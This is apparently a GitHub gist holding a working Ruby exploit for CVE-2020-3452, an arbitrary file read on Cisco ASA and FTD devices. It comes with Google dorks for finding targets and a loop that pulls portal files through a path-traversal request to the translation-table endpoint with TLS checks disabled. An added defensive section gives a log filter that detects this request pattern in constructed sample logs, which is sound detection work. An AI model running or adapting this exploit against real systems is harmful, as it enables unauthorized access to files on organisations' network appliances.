@komodoooo
Last active May 14, 2024 14:38
CVE-2020-3452 exploit
require 'http'
require 'openssl'

puts """
CVE-2020-3452
CISCO ASA&FTD arbitrary file read exploit
By komodo\n
"""

=begin
Google dorks to search vulnerable target:
inurl:"/+CSCOE+/"
inurl:logon.html "CSCOE"
(some of these may not be vulnerable)
=end

$cont=1
$dirname="CISCO_files"

# Create the output directory and change into it. If the name is already
# taken, retry with a numeric suffix (CISCO_files-2, CISCO_files-3, ...).
def dir(name=$dirname)
  begin
    Dir.mkdir(name)
    Dir.chdir(name)
  rescue Errno::EEXIST
    $cont+=1
    dir("#{$dirname}-#{$cont}")
  end
end

def main(target)
  # File names requested from the +CSCOE+ web portal directory.
  files = ["logo.gif","http_auth.html","user_dialog.html","localization_inc.lua",
           "portal_inc.lua","include","nostcaccess.html","ask.html","no_svc.html",
           "svc.html","session.js","useralert.html","ping.html","help","app_index.html",
           "tlbr","portal_forms.js","logon_forms.js","win.js","portal.css","portal.js",
           "sess_update.html","blank.html","noportal.html","portal_ce.html","portal.html",
           "home","logon_custom.css","portal_custom.css","preview.html","session_expired",
           "custom","portal_elements.html","commonspawn.js","common.js","appstart.js",
           "appstatus","relaymonjar.html","relaymonocx.html","relayjar.html",
           "relayocx.html","portal_img","color_picker.js","color_picker.html",
           "cedhelp.html","cedmain.html","cedlogon.html","cedportal.html",
           "cedsave.html","cedf.html","ced.html","lced.html","files",
           "041235123432C2","041235123432U2","pluginlib.js","shshim",
           "do_url","clear_cache","connection_failed_form","apcf",
           "ucte_forbidden_data","ucte_forbidden_url","cookie",
           "session_password.html","tunnel_linux.jnlp","tunnel_mac.jnlp",
           "sdesktop","gp-gip.html","auth.html","wrong_url.html","logon_redirect.html",
           "logout.html","logon.html","test_chargen"]

  # Strip a single trailing slash so the request path is built consistently.
  target.delete_suffix!("/") if target.end_with?("/")

  # TLS certificate verification is disabled for every request.
  @ctx = OpenSSL::SSL::SSLContext.new()
  @ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE

  dir()
  # Record which target the downloaded files came from.
  File.open("!target.txt", "w"){|f|f.write(target)}

  files.each do |file|
    # One request per file through the translation-table endpoint.
    r = HTTP.get("#{target}/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/#{file}&default-language&lang=../",
                 :ssl_context=>@ctx)
    if r.to_s.include?("File not found")
      puts "File '#{file}' not found"
    elsif r.code == 200
      output = File.open(file, "w")
      output.write(r.body)
      output.close()
      puts "Downloaded file #{file}"
    else
      # Any other status is treated as "not vulnerable" and ends the run.
      puts "Not vulnerable (status code #{r.code})"
      exit()
    end
  end
  puts "\nExploit finished, all downloaded files are stored in \n#{Dir.pwd}"
end

begin
  print "\rTarget url: "
  main(gets.chomp)
rescue => e
  abort(e.to_s)
end
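
A defensive counterpart, added here as an example and not part of komodoooo's gist: a Ruby filter that flags the request shape this script sends (`/+CSCOT+/translation-table` with a path in `textdomain` or `..` in `lang`). It assumes combined-format access logs from a proxy or WAF in front of the device; the log lines and the helpers `fully_decode`, `traversal_target` and `scan` are constructed for illustration.

```ruby
# Constructed sample lines in combined log format (not from a real device).
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [14/May/2024:14:01:02 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1" 200 5123
  198.51.100.4 - - [14/May/2024:14:01:09 +0000] "GET /+CSCOE+/logon.html HTTP/1.1" 200 2048
  203.0.113.7 - - [14/May/2024:14:01:11 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/session.js&default-language&lang=../ HTTP/1.1" 200 911
  192.0.2.10 - - [14/May/2024:14:02:00 +0000] "GET /+CSCOT+/translation-table?type=mst&textdomain=csd&lang=en HTTP/1.1" 200 300
LOG

LINE_RE = /\A(?<ip>\S+) .*?"[A-Z]+ (?<uri>\S+) HTTP\/[\d.]+" (?<status>\d{3})/

# Percent-decode repeatedly (bounded) so nested encoding cannot hide a value.
def fully_decode(value, rounds = 3)
  value = value.b # work on bytes to avoid encoding errors on odd input
  rounds.times do
    decoded = value.gsub(/%(\h\h)/) { Regexp.last_match(1).hex.chr }
    break if decoded == value
    value = decoded
  end
  value
end

# Returns the decoded textdomain value when the URI targets the
# translation-table endpoint with a path in textdomain or ".." in lang.
def traversal_target(uri)
  path, query = uri.split('?', 2)
  return nil unless fully_decode(path.to_s).downcase.end_with?('/+cscot+/translation-table')
  params = query.to_s.split('&').to_h do |kv|
    key, _, val = kv.partition('=')
    [fully_decode(key), fully_decode(val)]
  end
  lang, domain = params['lang'].to_s, params['textdomain'].to_s
  return nil unless lang.include?('..') || domain.match?(%r{[/\\]})
  domain.empty? ? '(none)' : domain
end

# Scan log text and return one finding per suspicious request.
def scan(log_text)
  log_text.each_line.filter_map do |line|
    m = LINE_RE.match(line) or next
    target = traversal_target(m[:uri]) or next
    { ip: m[:ip], status: m[:status].to_i, target: target }
  end
end

if __FILE__ == $PROGRAM_NAME
  scan(SAMPLE_LOG).each { |f| puts format('%-15s %d %s', f[:ip], f[:status], f[:target]) }
end
```

A 200 status on a flagged line does not by itself prove a file was returned, since the script above also checks the response body for "File not found".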